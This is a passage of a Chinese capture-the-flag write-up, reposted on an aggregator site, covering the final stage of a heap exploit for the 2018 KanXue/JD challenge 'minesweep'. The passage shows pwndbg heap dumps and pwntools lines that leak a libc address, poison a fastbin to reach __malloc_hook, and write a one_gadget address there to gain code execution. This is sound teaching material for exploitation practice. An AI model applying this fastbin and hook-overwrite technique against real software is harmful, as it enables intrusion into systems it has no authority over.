0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x00000000000000f1

0x56034da400a0:    0x00007f0f33623b78       0x00007f0f33623b78

0x56034da400b0:    0x6161616161616161     0x6161616161616161

0x56034da400c0:    0x6161616161616161     0x6161616161616161

0x56034da400d0:    0x6161616161616161     0x6161616161616161

0x56034da400e0:    0x6161616161616161     0x6161616161616161

0x56034da400f0:     0x6161616161616161     0x6161616161616161

0x56034da40100:    0x6161616161616161     0x6161616161616161

0x56034da40110:    0x6161616161616161     0x6161616161616161

0x56034da40120:    0x6161616161616161     0x6161616161616161

0x56034da40130:    0x6161616161616161     0x6161616161616161

0x56034da40140:    0x000056034da400a1     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x00000000000000f0      0x0000000000000020

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

由r1, r2,即错位的地址拼凑出来addr=0x7f0f33623b78

addr =u64(r1[0]+r2[0]+r1[3]+r2[3]+r1[6]+r2[6]+'\x00\x00')

main_arena+88=0x7f0f33623b78, main_arena_offset=0x3C1760 ==>

libc = addr - 0x3C17B8 = 0x7F0F332623C0

hook_addr = libc+0x3C1740 = 0x7F0F33623B00

one_addr = libc+0xe9f2d = 0x7F0F3334C2ED

log.info(hex(libc))

io.sendline('back,')

17. feed(0x30,'a'*0x28+p64(hook_addr)[:-1])

分配chunk1的地址0x56034da40010,写入内容后,将malloc_hook地址写入name所在位置,再free到fastbins[0x40]。

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x0000000000000000     0x6161616161616161

0x56034da40020:    0x6161616161616161     0x6161616161616161

0x56034da40030:    0x6161616161616161     0x00007f0f33623b00

0x56034da40040:    0x0000000000000040     0x0000000000000031

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021

0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x00000000000000f1

0x56034da400a0:    0x00007f0f33623b78       0x00007f0f33623b78

0x56034da400b0:    0x6161616161616161     0x6161616161616161

0x56034da400c0:    0x6161616161616161     0x6161616161616161

0x56034da400d0:    0x6161616161616161     0x6161616161616161

0x56034da400e0:    0x6161616161616161     0x6161616161616161

0x56034da400f0:     0x6161616161616161     0x6161616161616161

0x56034da40100:    0x6161616161616161     0x6161616161616161

0x56034da40110:    0x6161616161616161     0x6161616161616161

0x56034da40120:    0x6161616161616161     0x6161616161616161

0x56034da40130:    0x6161616161616161     0x6161616161616161

0x56034da40140:    0x000056034da400a1     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x00000000000000f0      0x0000000000000020

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

pwndbg> bins

fastbins

0x20: 0x0

0x30: 0x0

0x40:0x56034da40000◂—0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x56034da40090 —▸ 0x7f0f33623b78 (main_arena+88) ◂—0x56034da40090

smallbins

empty

largebins

empty

18. start()

没有变化

19. explore(1,1,3)

由于winflag所在地址内容为0x6161616161616161,因此会打印”leave name, myhero”

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x0000000000000000     0x6161616161616161

0x56034da40020:    0x6161616161616161     0x6161616161616161

0x56034da40030:    0x6161616161616161     0x00007f0f33623b00

io.recvuntil('hero\n')   

20. io.sendline(p64(one_addr))

在hook地址0x00007f0f33623b00写入name,即为One_gadget地址

pwndbg> x/gx 0x00007f0f33623b00

0x7f0f33623b00 <__memalign_hook>:   0x00007f0f3334c2ed

io.sendline('back,')

22. feed(0x30,'0')

执行malloc时,将执行__malloc_hook所在的one_gadget

相关文章

网友评论

      本文标题:看雪.京东 2018CTF 第十四题PWN-minesweep的

      本文链接:https://www.haomeiwen.com/subject/jendtctx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|看雪.京东 2018CTF 第十四题PWN-minesweep的|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!